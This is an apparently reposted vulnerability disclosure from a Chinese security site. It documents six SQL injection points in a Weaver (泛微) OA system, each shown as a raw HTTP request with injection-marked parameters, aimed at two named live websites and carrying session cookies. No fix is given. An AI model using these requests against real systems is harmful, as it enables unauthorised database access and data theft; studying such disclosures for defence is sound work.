记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

泛微某系统通用型SQL注入漏洞打包(全版本)

2014-12-24 15:20

对于躺枪的网站深表歉意哈~

被测网站:http://gl.triolion.com/ && http://oaf.yitoa.com:6688/

版本信息分别如下:

QQ图片20141109112348.jpg



QQ图片20141109112405.jpg



说明:主要以前面的网站为例,与后者交叉的证明两个SQL注入为通用型即可。



SQL注入漏洞(共6处)



1# 注入点1

code 区域
GET /homepage/Homepage.jsp?hpid=4*&subCompanyId=1&isfromportal=1&isfromhp=0 HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: http://gl.triolion.com/wui/main.jsp?templateId=1

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Proxy-Connection: Keep-Alive

DNT: 1

Host: gl.triolion.com

Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test



QQ图片20141109110351.jpg



另一站点同样存在

code 区域
GET /homepage/Homepage.jsp?hpid=21&subCompanyId=21&isfromhp=1&isfromportal=0&hastemplate= HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: http://oaf.yitoa.com:6688/leftFrame.jsp

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Proxy-Connection: Keep-Alive

DNT: 1

Host: oaf.yitoa.com:6688

Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4



QQ图片20141109111035.jpg





2# 注入点2

code 区域
GET /page/element/7/News.jsp?ebaseid=7&eid=17*&styleid=1&hpid=4&subCompanyId=1&e71415018052369= HTTP/1.1

Host: gl.triolion.com

Proxy-Connection: keep-alive

Accept: text/html, */*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36

Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2

Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7



注入1.jpg





另一站点同样存在

code 区域
GET //page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Host: oaf.yitoa.com:6688

DNT: 1

Proxy-Connection: Keep-Alive

Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4



QQ图片20141109111625.jpg





3# 注入点3

code 区域
GET /CRM/data/ViewCustomerBase.jsp?requestid=-1*&isrequest=&CustomerID=11613 HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: http://gl.triolion.com/CRM/data/ViewCustomer.jsp?CustomerID=11613*

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Proxy-Connection: Keep-Alive

DNT: 1

Host: gl.triolion.com

Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test



QQ图片20141109111845.jpg





4# 注入点4

code 区域
POST /page/element/compatible/view.jsp?ebaseid=9&eid=23*&styleid=1&hpid=4&subCompanyId=1&e71415018052423= HTTP/1.1

Host: gl.triolion.com

Proxy-Connection: keep-alive

Content-Length: 0

Accept: */*

Origin: http://gl.triolion.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36

Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2

Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7



注入2.jpg





5# 注入点5

code 区域
GET /page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415=' HTTP/1.1

Host: gl.triolion.com

Proxy-Connection: keep-alive

Accept: text/html, */*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36

Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2

Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7



注入3.jpg





6# 注入点6

code 区域
GET /proj/data/ViewProject.jsp?ProjID=56* HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: http://gl.triolion.com/proj/search/searchtask.jsp?e71415500119375=

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Proxy-Connection: Keep-Alive

DNT: 1

Host: gl.triolion.com

Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test



注入4.jpg

漏洞证明:

同上

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2014-082627

阅读:367560 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“泛微某系统通用型SQL注入漏洞打包(全版本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云